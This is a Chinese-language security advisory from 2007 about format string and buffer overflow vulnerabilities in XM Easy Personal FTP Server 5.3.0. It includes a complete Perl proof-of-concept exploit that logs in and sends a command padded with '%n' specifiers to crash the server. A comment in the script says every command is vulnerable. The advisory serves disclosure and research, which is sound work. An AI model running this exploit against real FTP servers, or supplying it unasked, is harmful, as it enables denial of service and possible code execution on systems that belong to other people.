XM Easy Personal FTP Server多个远程漏洞
发布日期:2007-02-28
更新日期:2007-03-02
受影响系统:dxmsoft XM Easy Personal FTP Server 5.3.0
描述:
BUGTRAQ ID:
22747
XM Easy Personal FTP Server是一款简单易用的个人FTP服务器工具。
XM Easy Personal FTP Server在Server log信息输出中显示服务器活动时存在格式串错误。攻击者可以通过向服务器发送包含有格式标识符的特制命令导致拒绝服务或执行任意代码。此外,发送特制命令还可能触发各种缓冲区溢出。
<*来源:Umesh Wanve
链接:
http://secunia.com/advisories/24330/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/usr/bin/perl -w
#=========================================================================================================
# XM Easy Personal FTP Server 5.3.0 Multiple vulnerabilities
# By Umesh Wanve
#=========================================================================================================
#
# Vendor:
http://www.dxm2008.com/
#
# Date: 28-02-2007
#
#
# 1) Multiple format string attacks. Every command is vulnerable.
# With only single % also the server crashes.
#
# 2) Multiple buffer overflow occurs in commands if we fuzz the server( Better way use ur own fuzzer)
#
#
# Code execution is possbile.
# This is latest version of FTP server.
#
# ###########################################################################################
use Net::FTP;
(($target = $ARGV[0])) || die "usage:$0 <target> <port>";
my $user = "test";
my $pass = "test";
$exploit_string = "%n" x 10;
print ":: Trying to connect to target system at: $target...\n";
$ftp = Net::FTP->new($target, Debug => 0, Port => 21) || die "could not connect: $!";
print "Connected!\n";
$ftp->login($user, $pass) || die "could not login: $!";
print "Logged in!\n";
$ftp->command("ABOR ",$exploit_string); # Every command is vulnerable. Use it what u like :)
print "Done!\n";
$ftp->quit;
建议:
厂商补丁:
dxmsoft
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.dxm2008.com/浏览次数:2697
严重程度:0(网友投票)
